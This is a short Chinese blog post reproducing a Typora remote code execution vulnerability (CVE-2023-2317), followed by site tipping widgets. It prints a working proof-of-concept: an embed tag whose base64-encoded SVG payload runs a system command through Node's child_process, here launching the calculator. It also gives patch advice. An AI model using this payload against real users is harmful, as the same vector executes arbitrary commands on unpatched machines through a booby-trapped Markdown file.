Typora 远程代码执行漏洞(CVE-2023-2317)

1.漏洞介绍

Typora是一款编辑器。

Typora 1.6.7之前版本存在安全漏洞,该漏洞源于通过在标签中加载 typora://app/typemark/updater/update.html ,可以在Typora主窗口中加载JavaScript代码。

2.影响版本

Typora < 1.6.7

 3.漏洞复现

查看下小翠儿的软件版本,发现是1.5.10,而且还是未激活版本的

然后在弥天实验室拿来POC

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

 随手新建一个后缀为MD的文件,把poc贴进去 。

用Typora打开小翠er.md文件,小翠儿发现需要点击文本内容,可以触发RCE漏洞,触发了计算器

补充:话说一半,poc部分解码如下,请参考

 修改建议: 

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://support.typora.io/What's-New-1.6/

Typora DOM-Based XSS leading to RCE (CVE-2023-2317)

防止钓鱼,不用不看md文件:)

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小翠儿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值